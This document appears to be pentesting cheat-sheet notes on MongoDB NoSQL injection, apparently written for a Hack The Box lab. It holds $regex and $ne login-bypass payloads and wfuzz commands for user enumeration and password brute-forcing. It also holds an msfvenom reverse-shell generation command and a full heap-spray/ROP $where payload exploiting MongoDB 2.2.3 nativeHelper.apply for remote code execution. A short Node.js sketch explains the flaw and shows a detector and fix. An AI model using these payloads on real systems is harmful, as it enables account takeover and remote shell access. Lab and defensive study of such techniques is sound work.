NoSQL

nosql injection

payload                                                description
username=admin&password[$regex]=^a.*&login=login       user = admin, password starts with a
username=admin&password[$regex]=^b.*&login=login       user = admin, password starts with b
username=admin&password[$regex]=^c.*&login=login       user = admin, password starts with c

user enumeration

wfuzz -c -z file,/usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt --sc 302 -d 'username=FUZZ&password[$ne]=NO_VALID_PASS&login=login' http://staging-order.mango.htb

wfuzz -c -z file,/usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt --sc 302 -d 'username=FUZZ&password[$ne]=NO_VALID_PASS&login=login' http://staging-order.mango.htb

password bruteforce

wfuzz -c -z file,/usr/share/wordlists/seclists/Fuzzing/alphanum-case-extra.txt --sc 302 -d 'username=admin&password[$regex]=^FUZZ.*&login=login' http://staging-order.mango.htb
remember that this is a regex: the characters . * ? \ | are metacharacters and & is the form-field separator, so they will always be "returned" as hits and must be excluded from the wordlist
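As an added example (not from these notes), a Node.js sketch of why the bracket syntax above works and what the fix looks like: a constructed stand-in for an Express extended body parser turns password[$regex] into a nested object, the vulnerable filter passes that straight to MongoDB, and the detector and hardened filter reject it. The parser and all function names are assumptions of this example.

```javascript
// Constructed stand-in for an extended (bracket-syntax) form-body parser:
// "password[$regex]=^a.*" becomes { password: { $regex: "^a.*" } }.
function parseForm(body) {
  const out = {};
  for (const pair of body.split("&")) {
    const i = pair.indexOf("=");
    const key = decodeURIComponent(i < 0 ? pair : pair.slice(0, i));
    const val = decodeURIComponent((i < 0 ? "" : pair.slice(i + 1)).replace(/\+/g, " "));
    const m = key.match(/^([^\[\]]+)\[([^\]]*)\]$/);
    if (m) {
      out[m[1]] = Object.assign(out[m[1]] || {}, { [m[2]]: val });
    } else {
      out[key] = val;
    }
  }
  return out;
}

// Vulnerable pattern: parsed values are dropped into the query filter as-is,
// so an attacker-supplied object with $-keys is interpreted as an operator.
function vulnerableFilter(form) {
  return { username: form.username, password: form.password };
}

// Detection: true when any field arrived as an object carrying a $-prefixed
// key; this is the condition to alert on in application or WAF logs.
function hasOperatorInjection(form) {
  return Object.values(form).some(
    (v) => v !== null && typeof v === "object" &&
      Object.keys(v).some((k) => k.startsWith("$"))
  );
}

// Hardened pattern: accept only primitive strings for credential fields.
// A string value is always literal equality to MongoDB, never an operator.
function safeFilter(form) {
  for (const field of ["username", "password"]) {
    if (typeof form[field] !== "string") {
      throw new TypeError(`${field} must be a string`);
    }
  }
  return { username: form.username, password: form.password };
}

// Walk the first payload from the table above through both code paths.
const probe = parseForm("username=admin&password[$regex]=^a.*&login=login");
console.log(JSON.stringify(vulnerableFilter(probe)), hasOperatorInjection(probe));
```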

MongoDB 2.2.3 - nativeHelper.apply Remote Code Execution

  • https://notes.offsec-journey.com/owasp-top-10-exploitation/untitled
    msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f js_le > payload.js
    
    |-> If attempting via web Mongo injection, try: ';shellcode=un.....
    |-> Note the // at the end to comment out the rest of the code.
    
    db.my_collection.find({'$where':'shellcode=unescape(">INSERT MSFVENOM GENERATED JS SHELLCODE>"); sizechunk=0x1000; chunk=""; for(i=0;i<sizechunk;i++){ chunk+=unescape("%u9090%u9090"); } chunk=chunk.substring(0,(sizechunk-shellcode.length)); testarray=new Array(); for(i=0;i<25000;i++){ testarray[i]=chunk+shellcode; } ropchain=unescape("%uf768%u0816%u0c0c%u0c0c%u0000%u0c0c%u1000%u0000%u0007%u0000%u0031%u0000%uffff%uffff%u0000%u0000"); sizechunk2=0x1000; chunk2=""; for(i=0;i<sizechunk2;i++){ chunk2+=unescape("%u5a70%u0805"); } chunk2=chunk2.substring(0,(sizechunk2-ropchain.length)); testarray2=new Array(); for(i=0;i<25000;i++){ testarray2[i]=chunk2+ropchain; } nativeHelper.apply({"x" : 0x836e204}, ["A"+"\x26\x18\x35\x08"+"MongoSploit!"+"\x58\x71\x45\x08"+"sthack is a nice place to be"+"\x6c\x5a\x05\x08"+"\x20\x20\x20\x20"+"\x58\x71\x45\x08"]);'})//